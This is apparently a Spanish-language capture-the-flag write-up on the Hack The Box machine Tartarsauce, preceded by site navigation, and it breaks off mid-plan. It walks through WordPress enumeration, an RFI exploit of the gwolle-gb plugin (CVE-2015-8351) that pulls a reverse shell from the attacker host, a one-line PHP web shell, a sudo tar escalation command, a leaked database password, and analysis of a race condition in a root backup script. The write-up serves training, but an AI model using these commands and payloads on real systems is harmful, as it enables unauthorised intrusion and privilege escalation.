Pentest Notes
  • 🏠/home/x3m1Sec/.pt-notes
  • 📝Pentest Notes
    • 🔍Information Gathering
    • 📜Protocols and Services
      • DNS Port (53)
      • FTP Port (21)
      • IMAP Ports (143,993)
      • IPMI Port (623)
      • Kerberos Port (88)
      • MSSQL Port (1433)
      • MySQL Port (3306)
      • NFS Ports (111,2049)
      • NetBIOS Ports (137,138,139)
      • Oracle TNS Port (1521)
      • POP3 Port (110)
      • PostgreSQL Port (5432)
      • RDP Port (3389)
      • SMB Ports (139,445)
      • SMTP Port (25)
      • SNMP Ports (161,162)
      • Java RMI Port (1099)
      • LDAP Ports (389,636)
      • Apache Tomcat Ports (8080,8180)
      • Port 123 - NTP
      • RPCBind Ports (111,32771)
      • Email Services
      • Nmap Commands for Port Discovery
    • 🕸️Web Applications
      • Web Attacks
        • Cross Site Scripting (XSS)
        • SQL Injection (SQLi)
        • File Upload Vulnerabilities
        • Insecure Direct Object References (IDOR)
        • OS Command Injection
        • Local File Inclusion (LFI)
        • Remote File Inclusion (RFI)
        • XML External Entities (XXE)
        • HTTP Verb Tampering
        • Sub-domain Enumeration
      • Web Technologies
        • Tomcat
        • CGI Applications
        • WordPress
        • SAP Netweaver
        • Joomla
        • Drupal
        • Gitlab
        • Jenkins
        • Microsoft IIS
        • osTicket
        • PRTG Network Monitor
        • Splunk
      • Fuzzing
    • 🪟Active Directory Pentesting
      • 🔍Initial Enumeration
        • 👤Enumerating Users
      • 🛠️Abusing ACLs/ACEs
      • 🏛️Active Directory Certificate Services (ADCS)
      • 🎭Attacking Kerberos
      • 🐶Bloodhound
      • 🧰Tools
        • 🩸BloodyAD
        • 📦Impacket
        • 🦁Kerbrute
        • 📚LDAPSearch
        • 🧠PowerView.py
    • 🐧Linux Privilege Escalation
      • Linux PrivEsc Summary
      • PriveEsc Checklist
      • Enumerating Attack Vectors
      • Privileged Groups
      • Environment Variables Abuse
      • Capabilities Abuse
      • Programs, Jobs and Services
      • Miscellaneous Techniques
      • Recent CVEs
    • 🪟Windows Privilege Escalation
      • PriveEsc checklist
      • Enumerating Attack Vectors
      • Excessive User Rights Abuse
      • Built-in Groups Abuse
      • File System ACLs
      • Services Hijacking
      • User Account Control (UAC) Bypass
      • Living off the Land
    • 🐛Bug Bounty Hunting
      • Bug Bounty Tools
    • 👾Utilities, Scripts and Payloads
      • Shells and Payloads
      • Metasploit Framework
      • File Transfers
      • Pivoting, Tunneling, Port Forwarding
      • Password Attacks
      • Spawn TTY Shells
  • 🎮CTFs
    • 🟩Hack The Box
      • Linux
        • Easy Level
          • Busqueda
          • Help
          • Sau
          • Broker
          • Sea
          • Nibbles
          • Codify
          • Cozyhosting
          • Devvortex
          • Irked
          • Keeper
          • Knife
          • Pilgrimage
          • Soccer
          • Sunday
          • Tabby
          • Usage
          • Bashed
          • Analytics
          • Networked
          • Swagshop
          • Pandora
          • OpenAdmin
          • Precious
          • Boardlight
          • Editorial
        • Medium Level
          • Monitored
          • Updown
          • Popcorn
          • Jarvis
          • Mentor
          • Poison
          • Solidstate
          • Tartarsauce
          • Nineveh
          • Magic
          • Builder
        • Hard Level
    • 🔴TryHackMe
  • 🎓Road to certification
    • eJPTv2
      • My review
    • CPTS
      • Enumeration
        • Enum Cheklist
        • Initial Enumeration
      • Nmap
        • Nmap Full Flag
        • Protocol Scan
        • Scan-network-with-nmap
      • Attacking Common Applications
        • 1.Content Management Systems (CMS)
          • 1.-Wordpress-discovery-and-enumeration
          • 2.-Attacking-wordpress
          • 3.-Joomla-discovery-and-enumeration
          • 4.-Attacking-joomla
          • 5.-Drupal-discovery-and-enumeration
          • 6.-Attacking-drupal
        • 2. Servlet Containers and Software Development
          • 10.-Attacking-jenkins
          • 7.-Tomcat-discovery-and-enumeration
          • 8.-Attacking-tomcat
          • Attacking Jenkins - Focused Commands & Key Points
        • 3. Infrastructure and Network Monitoring Tools
          • 11.-Aplunk-discovery-and-enumeration
          • 12.-Attacking-splunk
          • 13.Prtg-network-monitor
        • 4. Customer Service Mgmt & Configuration Management
          • 14.-Osticket
          • 15.Gitlab-discovery-and-enumeration
          • 16.-Attacking-gitlab
        • 5. Common Gateway Interfaces
          • 17.-Attacking-tomcat-cgi
          • 18.-Attacking-cgi-applications-shellshock
        • 6. Thick Client Applications
          • 19.-Attacking-thick-client-applications
          • 20.Exploiting-web-vulnerabilities-in-thick-client-applications
        • 7. Miscellaneous Applications
          • 21.-Coldfusion-discovery-and-enumeration
          • ColdFusion Exploitation Guide
          • 23.-IIS-tilde-enumeration
          • 24.Attacking-ldap
          • 25.-Web-mass-assignment-vulnerabilities
          • 26.Attacking-applications-connecting-to-services
          • 27.Other-notable-applications
        • 8. Closing Out
          • 28.Application-hardening
      • Attacking Common Services
        • 1.Protocol-specific-attacks
        • 2.FTP
        • 3.SMB
        • 4.SQL-databases
        • 5.RDP
        • 6.DNS
        • 7.SMTP
      • Active Directory Enumeration & Attacks
        • 0. AD Pentest
          • Quick Guide To AD Pentesting
          • Active Directory: Full Attack Name
          • Active Directory Advanced Concepts
          • Active Directory Delegation
          • Beyond-Active-Directory
        • 1.Initial Enumeration
          • 1.External Recon and Enumeration Principles
          • 1.initial-enumeration-of-the-domain
          • Active-Directory-Basic-Command
        • 2.Sniffing out a Foothold
          • 3. LLMNR-NBT-NS Poisoning - from Linux
          • 4.LLMNR-NBT-NS Poisoning - from Windows
        • 3.Sighting In, Hunting For A User
          • 5.Password Spraying Overview
          • 6.Enumerating & Retrieving Password Policies
          • 7.Password Spraying - Making a Target User List
        • 4.Spray Responsibly
          • 8. Internal Password Spraying - from Linux
          • 9.Internal Password Spraying - from Windows
        • 5.Deeper Down the Rabbit Hole
          • 10. Enumerating Security Controls
          • 11. Credentialed Enumeration - from Linux
          • 12.Credentialed Enumeration - from Windows
          • 13. Living Off the Land
        • 6.Cooking with Fire
          • 14.Kerberoasting - from Linux
          • 15. Kerberoasting - from Windows
          • Kerberoasting Attack Step by Step Guide
          • Kerberoasting Attack Step by Step Guide
        • 7.An ACE in the Hole
          • 16.Access Control List (ACL) Abuse Primer
          • 17. ACL Enumeration
          • 18. ACL Abuse Tactics
          • 19. DCSync
        • 8.Stacking The Deck
          • 20.Privileged Access
          • 21.Kerberos Double Hop Problem
          • 22.Bleeding Edge Vulnerabilities
          • 23.Miscellaneous Misconfigurations
        • 9.Why So Trusting
          • 24.Domain Trusts Primer
          • 25.Attacking Domain Trusts - Child - Parent Trusts - from Windows
          • 26. Attacking Domain Trusts - Child - Parent Trusts - from Linux
        • 10.Breaking Down Boundaries
          • 27.Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
          • 28.Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
        • 11.Defensive Considerations
          • 29.Hardening-active-directory
          • 30.Additional AD Auditing Techniques
      • Linux Privilege Escalation
        • Linux-hardening
        • Linux-priv-esc-to-quick-check-the-system
        • 1.Information Gathering
          • 1.Environment-enumeration
          • 2.Linux-services-and-internals-enumeration
          • 3.Credential-hunting
        • 2.Environment-based Privilege Escalation
          • 4.Path-abuse
          • 5.Wildcard-abuse
          • 6.Escaping-restricted-shells
        • 3.Permissions-based Privilege Escalation
          • 10.Capabilities
          • 7.-Special-permissions
          • 8.Sudo-rights-abuse
          • 9.Privileged-groups
        • 4.Service-based Privilege Escalation
          • 11.Vulnerable-services
          • 12.Cron-job-abuse
          • LXC Privilege Escalation Techniques
          • 14.-Docker
          • 15.Kubernetes
          • 16.Logrotate
          • 17.Miscellaneous-techniques
        • 5.Linux Internals-based Privilege Escalation
          • 18.Kernel-exploits
          • 19.Shared-libraries
          • 20.Shared-object-hijacking
          • 21.Python-library-hijacking
        • 6.Recent 0-Days
          • 22.Sudo
          • 23.Polkit
          • 24.Dirty-pipe
          • 25.Netfilter
      • Windows Privilege Escalation
        • Priv-Esc
        • 1.Getting the Lay of the Land
          • 1.Situational-awareness
          • 2.Initial-enumeration
          • 3.Communication-with-processes
        • 2.Windows User Privileges
          • 4.windows-privileges-overview
          • 5.Seimpersonate-and-seassignprimarytoken
          • 6.Sedebugprivilege
          • Exploiting SeTakeOwnershipPrivilege
        • 3.Windows Group Privileges
          • 10.DNSadmins
          • 11.Hyper-v-administrators
          • Key Concepts:
          • Key Concepts:
          • 8.Windows-built-in-groups
          • Exploiting Event Log Readers Group for Security Log Access
        • 4.Attacking the OS
          • 14.User-account-control
          • 15.Weak-permissions
          • 16.Kernel-exploits
          • 17.Vulnerable-services
          • 18.DLL-injection
        • 5.Credential Theft
          • 19.Credential-hunting
          • 20.Other-files
          • 21.Further-credential-theft
        • 6.Restricted Environments
          • 22.-Citrix-breakout
        • 7.Additional Techniques
          • 23.Interacting-with-users
          • 24.Pillaging
          • 25.Miscellaneous-techniques
        • 8.Dealing with End of Life Systems
          • Key Points:
          • 27.windows-server
          • 28.windows-desktop-versions
      • Server-side Attacks
        • Server-side-vulnerabilities
      • Web Attacks
        • 1.-HTTP-verb-tampering
        • 2.-Insecure-direct-object-references-idor
        • 3.-XML-external-entity-xxe-injection
        • Web-attacks-to-the-point
      • Web Service & API Attacks
        • web-service-and-api-attacks
      • Command-injections
      • SQL-injection
      • XSS
        • XSS-based Session Hijacking
      • Broken Authentication
      • Login-brute-forcing
      • Password-attacks
      • Password-cracking
      • Session Security Guide
      • File-transfer
      • File-upload-attacks
      • Shells and payloads
      • Upgrading-tty-shell
      • Using-the-metasploit-framework
      • File Inclusion
        • 1.File Disclosure
          • 1.Local-file-inclusion-lfi
          • 2.Basic-bypasses
          • 3.PHP-filters
        • 2.Remote Code Execution
          • 4.PHP-wrappers
          • 5.Remote-file-inclusion-rfi
          • 6.LFI-and-file-uploads
          • 7.LOG-poisoning
        • 3.Automation and Prevention
          • 8.Automated-scanning
          • 9.File-inclusion-prevention
      • Ligolo-ng
      • Pivoting-tunneling-and-port-forwarding
      • TIPS
      • CheatSheet
    • OSCP
      • Preparation
      • Cheatsheets
      • Machine List
  • 📚Resources
    • Cheat Sheets
      • Default Passwords
      • Kerberoast
      • Mimikatz
      • Powerup
    • Hashcat Word lists and Rules
    • Metasploit Modules
    • Misc Snippets
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • Reverse Shell Generator
    • Pentestmonkey Revshell
    • OSINT Tools
    • Weakpass
Powered by GitBook
On this page
  • 📝 Descripción
  • 🔭 Reconocimiento
  • 🌐 Enumeración Web
  • 💻 Explotación
  1. CTFs
  2. Hack The Box
  3. Linux
  4. Medium Level

Tartarsauce

PreviousSolidstateNextNineveh

Last updated 11 days ago

Publicado: 17 de Mayo de 2025 Autor: José Miguel Romero aKa x3m1Sec Dificultad: ⭐ Medium

📝 Descripción

TartarSauce es una máquina Linux de dificultad media que presenta múltiples vectores de ataque a través de aplicaciones web. El objetivo es explotar vulnerabilidades en varios servicios web para obtener acceso inicial y luego escalar privilegios mediante una tarea cron que ejecuta un script de backup inseguro. La máquina simula un entorno realista donde el atacante debe encadenar varias técnicas para lograr comprometer completamente el sistema, desde la enumeración de directorios hasta la explotación de un plugin vulnerable de WordPress y finalmente manipular un script de backup con privilegios elevados para obtener acceso como root.

La máquina contiene un servidor web Apache que aloja múltiples aplicaciones, incluyendo un WordPress y un CMS Monstra, cada uno con sus propias vulnerabilidades. La parte más interesante está en la escalada de privilegios, que requiere una comprensión profunda del funcionamiento de un script de backup personalizado y la capacidad de aprovechar una ventana de tiempo específica para manipular archivos y obtener información sensible.

Esta máquina es excelente para practicar:

  • Enumeración web exhaustiva

  • Explotación de plugins de WordPress (RFI)

  • Técnicas de escalada de privilegios con tareas cron

  • Race conditions y manipulación de archivos temporales

🔭 Reconocimiento

Ping para verificación en base a TTL

❯  ping -c2 10.10.10.88
PING 10.10.10.88 (10.10.10.88) 56(84) bytes of data.
64 bytes from 10.10.10.88: icmp_seq=1 ttl=63 time=150 ms
64 bytes from 10.10.10.88: icmp_seq=2 ttl=63 time=150 ms

--- 10.10.10.88 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1006ms
rtt min/avg/max/mdev = 149.835/149.853/149.872/0.018 ms

💡 Nota: El TTL cercano a 64 sugiere que probablemente sea una máquina Linux.

Escaneo de puertos

 ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.88 | grep ^[0-9] | cut -d '/' -f1 | tr '\n' ',' | sed s/,$//)
echo $ports
80

Enumeración de servicios

nmap -sC -sV -p$ports 10.10.10.88 -oN services.txt

Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-12 11:54 CEST
Nmap scan report for 10.10.11.28
Host is up (0.048s latency).

PORT     STATE SERVICE VERSION
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Landing Page
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)

🌐 Enumeración Web

80 HTTP

http://10.10.10.88/

A través del fichero robots.txt logamos enumerar algunos recursos de forma manual:

http://10.10.10.88/robots.txt

User-agent: *
Disallow: /webservices/tar/tar/source/
Disallow: /webservices/monstra-3.0.4/
Disallow: /webservices/easy-file-uploader/
Disallow: /webservices/developmental/
Disallow: /webservices/phpmyadmin/

🕷️Fuzzing de directorios

Veamos qué logramos enumerar realizando fuzzing de directorios de manera automatizada con herramientas feroxbuster y dirsearch:

feroxbuster -u http://10.10.10.88 -r  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --scan-dir-listings -C 404 -x php,xml

Encontramos varias rutas interesantes:

http://10.10.10.88/webservices/monstra-3.0.4/admin/

Enumeramos un panel de login que parece tener detrás un CMS llamado Monstra en la versión 3.0.4. Esta versión parece vulnerable a RCE:

Probamos con las credenciales básicas admin:admin y logramos acceder. Tenemos las credenciales, estamos en disposición de usar el exploit anterior para explotar un RCE de la siguiente forma:

searchsploit -m php/webapps/43348.txt

Básicamente consiste en crear un archivo con extensión .php7 con el siguiente contenido y subirlo a través del módulo de subida de archivos

<?php $cmd=$_GET['cmd']; system($cmd); ?>

Tras probar con diversas extensiones siempre obtenemos el mismo error:

Por lo que parece que es un punto muerto o rabbit hole y debemos seguir buscando otro vector de ataque:

http://10.10.10.88/webservices/wp/

Observamos que no está cargando correctamente el contenido (probablemente porque se esté aplicando vhosting) así que revisamos el código fuente:

Añadimos el vhost tartarsauce.htb a nuestro fichero /etc/hosts y recargamos la página

echo "10.10.10.88 tartarsauce.htb" | sudo tee -a /etc/hosts

Enumerando manualmente observamos en el código fuente que el wordpress está usando un tema llamado voce.

Y la versión de wordpress es la 4.9.4

También descubrimos accediendo a la ruta: http://tartarsauce.htb/webservices/wp/index.php/wp-json/wp/v2/users/ un usuario llamado wpadmin:

Automatizamos esto es un poco usando la herramienta wp-scan y confirmamos la información anterior:

wpscan --url http://tartarsauce.htb/webservices/wp/ -e ap
Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://tartarsauce.htb/webservices/wp/xmlrpc.php
 | Found By: Link Tag (Passive Detection)
 | Confidence: 100%
 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://tartarsauce.htb/webservices/wp/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://tartarsauce.htb/webservices/wp/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.4 identified (Insecure, released on 2018-02-06).
 | Found By: Rss Generator (Passive Detection)
 |  - http://tartarsauce.htb/webservices/wp/index.php/feed/, <generator>https://wordpress.org/?v=4.9.4</generator>
 |  - http://tartarsauce.htb/webservices/wp/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.9.4</generator>

[+] WordPress theme in use: voce
 | Location: http://tartarsauce.htb/webservices/wp/wp-content/themes/voce/
 | Latest Version: 1.1.0 (up to date)
 | Last Updated: 2017-09-01T00:00:00.000Z
 | Readme: http://tartarsauce.htb/webservices/wp/wp-content/themes/voce/readme.txt
 | Style URL: http://tartarsauce.htb/webservices/wp/wp-content/themes/voce/style.css?ver=4.9.4
 | Style Name: voce
 | Style URI: http://limbenjamin.com/pages/voce-wp.html
 | Description: voce is a minimal theme, suitable for text heavy articles. The front page features a list of recent ...
 | Author: Benjamin Lim
 | Author URI: https://limbenjamin.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://tartarsauce.htb/webservices/wp/wp-content/themes/voce/style.css?ver=4.9.4, Match: 'Version: 1.1.0'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:06 <=======================================================================================================> (652 / 652) 100.00% Time: 00:00:06
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:25 <=====================================================================================================> (2575 / 2575) 100.00% Time: 00:00:25

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <========================================================================================================> (137 / 137) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:00 <==============================================================================================================> (75 / 75) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:01 <===================================================================================================> (100 / 100) 100.00% Time: 00:00:01

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] wpadmin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://tartarsauce.htb/webservices/wp/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

Parece que no está logrando enumerar plugins, usando la flag "para intentar realizar un escaneo más agresivo:

wpscan --url http://10.10.10.88:80/webservices/wp -e ap --plugins-detection aggressive

Vemos además que este wordpress tiene habilitado xmlrpc, lo cual nos permite realizar ataques de fuerza bruta contra el panel de login.

 wpscan --url http://tartarsauce.htb/webservices/wp -P /usr/share/wordlists/rockyou.txt -U "wpadmin"
+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:18:31 <=================================================================================================> (109775 / 109775) 100.00% Time: 00:18:31
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
 | Last Updated: 2025-02-14T18:49:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.3.7
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.0.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt

[+] brute-force-login-protection
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/
 | Latest Version: 1.5.3 (up to date)
 | Last Updated: 2017-06-29T10:39:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/, status: 403
 |
 | Version: 1.5.3 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt

[+] gwolle-gb
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
 | Last Updated: 2025-03-26T17:07:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
 | [!] The version is out of date, the latest version is 4.8.1
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/, status: 200
 |
 | Version: 2.3.10 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt

También hemos logrado enumerar un usuario wp-admin que confirmamos que existe al intentar usarlo el panel de login: http://tartarsauce.htb/webservices/wp/wp-login.php

Al estar habilitado xmlrpc, intentamos un ataque de fuerza bruta aunque no tenemos éxito:

wpscan --url http://tartarsauce.htb/webservices/wp/ -P /usr/share/wordlists/rockyou.txt -U "wpadmin"

Verificamos si alguno de los plugins enumerados anteriormente es vulnerable y encontramos que la versión 1.5.3 de gwolle-gb sí lo es:

💻 Explotación

CVE-2015-8351

Para llevar a cabo la explotación usaremos el siguiente exploit:

https://github.com/G4sp4rCS/exploit-CVE-2015-8351

Descargamos el exploit y le damos permisos de ejecución

git clone https://github.com/G4sp4rCS/exploit-CVE-2015-8351  
cd exploit-CVE-2015-8351  
chmod +x exploit.py

Copiamos una php shell de pentestmonkey que usaremos para explotar el RFI:

 cp /usr/share/webshells/php/php-reverse-shell.php .

Establecemos el puerto y la ip de nuestro host atacante en la php reverse shell.

Disponibilizamos la php reverse shell en nuestro host de ataque mediante un servidor web en python:

python3 -m http.server 80

A continuación iniciamos un listener en el puerto especificado en nuestro host de ataque:

nc -nlvp 1234

Lanzamos el exploit

python3 exploit.py http://10.10.10.88/webservices/wp 10.10.14.8 1234
Error al enviar el exploit. Código de estado: 500

Observamos que nos falla porque espera que el nombre del archivo .php se llame wp-load.php así que renombramos nuestra reverse shell para que tenga ese mismo nombre y relanzamos el exploit

mv shell.php wp-load.php

Foothold

Ganamos acceso a la máquina:

www-data@TartarSauce:/home$ cd onuma
bash: cd: onuma: Permission denied
www-data@TartarSauce:/home$ ls -la
total 12
drwxr-xr-x  3 root  root  4096 May 12  2022 .
drwxr-xr-x 22 root  root  4096 May 12  2022 ..
drwxrw----  5 onuma onuma 4096 May 12  2022 onuma

Mejora de la shell

script /dev/null -c bash

CTRL + Z

stty raw echo; fg
reset xterm

export TERM=xterm

Enumeramos un directorio usuario llamado onuma aunque no tenemos permisos para ver su contenido.

Verificamos si el usuario www-data puede ejecutar algún comando como sudo:

www-data@TartarSauce:/var$ sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar
www-data@TartarSauce:/var$

Vemos que aunque no puede ejecutar ningún comando como super usuario, sí que puede ejecutar uno como usuario onuma sin que tenga que especificar la contraseña:

https://gtfobins.github.io/gtfobins/tar/#sudo

Escalamos a usuario onuma usando el siguiente comando:

sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Una vez que ya somos onuma podemos leer la primera flag:

onuma@TartarSauce:/var/backups$ cd /home
onuma@TartarSauce:/home$ ls
onuma
onuma@TartarSauce:/home$ cd onuma
onuma@TartarSauce:~$ cat user.txt

👑 Escalada de privilegios

Enumeramos la máquina para ver si podemos encontrar algo que nos permita movernos lateralmente y/o escalar privilegios. Sabemos que hay una aplicación wordpress instalada, por lo que revisamos el directorio /var/www/html/webservices/wpy encontramos credenciales en el fichero wp-config.php

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp');

/** MySQL database username */
define('DB_USER', 'wpuser');

/** MySQL database password */
define('DB_PASSWORD', 'w0rdpr3$$d@t@b@$3@cc3$$');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

Parece otro callejón sin salida ya que esta contraseña no nos sirve para conectarnos a la base de datos ni tampoco para usarla como usuario root.

Continuamos enumerando y encontramos algo interesante en el directorio /var/backups

Parece que hay una herramienta que el usuario onuma está usando llamado backuperer.

which backuperer

onuma@TartarSauce:/var/backups$ which backuperer
/usr/sbin/backuperer

Buscamos referencias a este archivo

grep -ilr backuperer / 2>/dev/null

Revisamos el contenido de este script

onuma@TartarSauce:/var/backups$ cat /usr/sbin/backuperer 

#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi

A continuación repasaremos las partes más importantes del script

  • Ejecutar /bin/tarcomo onumay hacer una copia de seguridad $basediren un archivo tar comprimido con gzip llamado$tmpfile

  • $basediry $tmpfilese definen en las variables en la parte superior del script

  • $basedirse define como/var/www/html

  • $tmpfilees un nombre aleatorio, por lo que/var/tmp/.{randomized_chars}

  • Luego, pausamos arbitrariamente la ejecución del script durante 30 segundos.

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

  • Define una función llamada integrity_chkque mira recursivamente $basedir: /var/www/htmly $check$basedir:/var/tmp/check/var/www/html

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi

  • Crear el directorio $check:/var/tmp/check

  • Extracto $tmpfile: /var/tmp/.{randomized_chars}a $check:/var/tmp/check

  • Entonces, if [[ $(integrity_chk) ]]si se diff -r $basedir $check$basedirdevuelve algún resultado, los archivos en $basediry en no $checkbasedirson los mismos . El resultado del diffcomando se registrará en $errormsg:/var/backups/onuma_backup_error.txt

Podemos ver que el script se ejecuta en intervalos de cinco minutos inspeccionando /var/backups/onuma_backup_test.txty observando la marca de tiempo de la última ejecución.

Estoy casi seguro de que este script se ejecuta a través del rootcrontab del usuario, ya que el trabajo cron no está en el crontab de onuma ni en ningún /etc/cronarchivo legible.

Mi plan para abusar del script es:

  1. Monitorizar la creación de $tmpfile:/var/tmp/.{randomized_chars}

  2. Una vez creado este archivo, tenemos 30 segundos para crear una condición que integrity_chk()produzca algún resultado.

  3. Una vez $tmpfilecreado, se vincula simbólicamente /root/root.txty /etc/shadowen /var/www/htmlcomo www-datausuario

